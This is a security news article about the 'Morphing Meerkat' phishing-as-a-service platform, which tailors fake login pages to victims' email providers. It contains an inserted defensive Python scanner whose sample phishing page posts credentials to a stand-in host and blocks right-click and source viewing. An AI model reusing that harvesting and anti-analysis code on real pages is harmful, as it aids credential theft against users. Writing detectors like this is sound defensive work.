Cybersecurity researchers have exposed a sophisticated phishing-as-a-service platform, Morphing Meerkat. This platform dynamically creates fake login pages tailored to the victim's email service provider by utilizing DNS MX records, leading to highly targeted credential theft.
What happened
Cybersecurity researchers have uncovered a new phishing-as-a-service (PhaaS) platform that uses Domain Name System (DNS) mail exchange (MX) records to generate fake login pages impersonating approximately 114 brands. This sophisticated platform, tracked by DNS intelligence firm Infoblox under the moniker "Morphing Meerkat," enables cybercriminals to target victims with highly convincing phishing attacks.
Going deeper
Morphing Meerkat operates by exploiting open redirects on advertising technology (adtech) infrastructure, compromising legitimate domains, and leveraging various channels, including Telegram, to distribute stolen credentials.
The phishing scheme is estimated to have distributed thousands of spam emails, often using compromised WordPress sites and vulnerabilities in ad networks like Google-owned DoubleClick to bypass security filters. Additionally, the toolkit supports automatic translation of phishing content into over a dozen languages, including English, Korean, Spanish, Russian, German, Chinese, and Japanese, broadening its global reach.
What was said
Infoblox detailed the tactics used by Morphing Meerkat, stating: "The threat actor behind the campaigns often exploits open redirects on adtech infrastructure, compromises domains for phishing distribution, and distributes stolen credentials through several mechanisms, including Telegram."
The firm also highlighted the campaign's ability to dynamically serve phishing pages tailored to victims’ email service providers. "This attack method is advantageous to bad actors because it enables them to carry out targeted attacks on victims by displaying web content strongly related to their email service provider," they said.
Furthermore, the phishing landing pages employ various anti-analysis techniques: "In addition to complicating code readability via obfuscation and inflation, the phishing landing pages incorporate anti-analysis measures that prohibit the use of mouse right-click as well as keyboard hotkey combinations Ctrl + S (save the web page as HTML), Ctrl + U (open the web page source code)."
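As an added, illustrative defender-side check (not code from the article, from Infoblox, or from the kit itself), the following Python scanner flags the anti-analysis behaviours quoted above when they appear in a fetched login page: a contextmenu handler that suppresses right-click, a keydown handler that intercepts Ctrl + S / Ctrl + U, and an eval() loader fed by a runtime-decoded string. It also flags a form that posts credentials to a host other than the page's own. The two sample pages, the rule names and the regular expressions are constructed assumptions for this example, not signatures of the real campaign.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a credential-harvesting landing page showing the
# anti-analysis behaviour described above (right-click and Ctrl+S / Ctrl+U
# blocked) plus an eval-of-decoded-string loader. Not a real kit sample.
SUSPICIOUS_PAGE = """<html><body>
<form action="https://collect.example.invalid/post" method="post">
  <input name="user"><input name="pass" type="password"></form>
<script>
document.addEventListener('contextmenu', function (e) { e.preventDefault(); });
document.onkeydown = function (e) {
  if (e.ctrlKey && (e.keyCode == 83 || e.keyCode == 85)) { return false; }
};
eval(atob('Ly8gcGF5bG9hZA=='));
</script></body></html>"""

# Constructed benign login page: relative form action, no analysis blockers.
BENIGN_PAGE = """<html><body>
<form action="/login" method="post"><input name="user"></form>
<script>document.querySelector('input[name=user]').focus();</script>
</body></html>"""

# Heuristic rules (assumptions for this example), applied to inline script
# text. JavaScript identifiers are case-sensitive, so no re.I here.
RULES = {
    # contextmenu handler that suppresses the event -> right-click disabled
    "right_click_blocked": re.compile(
        r"contextmenu[\s\S]{0,200}?(preventDefault|return\s+false)"),
    # Ctrl + S (keyCode 83 / KeyS) or Ctrl + U (keyCode 85 / KeyU) intercepted
    "save_source_hotkeys_blocked": re.compile(
        r"ctrlKey[\s\S]{0,200}?(keyCode\s*===?\s*8[35]|\bKey[SU]\b|key\s*===?\s*['\"][su]['\"])"),
    # eval() fed by a runtime-decoded string: a common obfuscation loader
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(atob|unescape|decodeURIComponent)\s*\("),
}


def inline_scripts(html: str) -> str:
    """Concatenate the bodies of all inline <script> blocks."""
    return "\n".join(re.findall(r"<script[^>]*>([\s\S]*?)</script>", html, re.I))


def form_posts_offsite(html: str, page_url: str) -> bool:
    """True if any <form action> targets a host other than the page's own."""
    page_host = urlparse(page_url).netloc.lower()
    for action in re.findall(r"<form[^>]*\baction\s*=\s*['\"]([^'\"]*)['\"]", html, re.I):
        host = urlparse(action).netloc.lower()
        if host and host != page_host:  # relative actions have no netloc
            return True
    return False


def scan_landing_page(html: str, page_url: str) -> dict:
    """Return the triggered heuristics and a verdict for one fetched login page."""
    js = inline_scripts(html)
    findings = [name for name, rx in RULES.items() if rx.search(js)]
    if form_posts_offsite(html, page_url):
        findings.append("credentials_posted_offsite")
    return {
        "url": page_url,
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


if __name__ == "__main__":
    print(scan_landing_page(SUSPICIOUS_PAGE, "https://docs-share.example.test/view"))
    print(scan_landing_page(BENIGN_PAGE, "https://mail.example.test/login"))
```

The rules are deliberately narrow: right-click and hotkey suppression also appear on some legitimate sites, so a single hit is a signal to triage, not a verdict on its own, whereas a login form posting to an unrelated host is a much stronger indicator of credential harvesting.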
Why it matters
By tailoring phishing pages to victims' email service providers and implementing strong anti-detection techniques, cybercriminals are more likely to execute successful credential theft operations. This threatens both individual users and organizations that rely on email for communication and business operations.
If login credentials are compromised, attackers could gain unauthorized access to sensitive data, potentially leading to data breaches and financial losses.
What to look out for
Users should remain vigilant against phishing attempts by:
- Verifying the legitimacy of email links before clicking, especially those claiming to lead to shared documents.
- Checking the URL of any login page to ensure it matches the official website.
- Enabling multi-factor authentication (MFA) to add an extra layer of security.
- Being cautious of emails with urgent or alarming messages designed to provoke immediate action.
- Regularly updating security software and staying informed about emerging phishing tactics.
FAQs
What is Phishing-as-a-Service (PhaaS)?
PhaaS is a model where cybercriminals offer ready-made phishing tools and infrastructure to other attackers, making it easier to launch phishing campaigns without advanced technical knowledge.
Why is phishing through DNS MX records particularly dangerous?
This method enhances the realism of phishing attacks by ensuring that victims see login pages that match their actual email provider, increasing the likelihood of credential theft.
How can businesses protect their employees from PhaaS attacks?
Businesses should implement email filtering solutions, conduct regular phishing awareness training, enforce strong password policies, and require multi-factor authentication for sensitive accounts.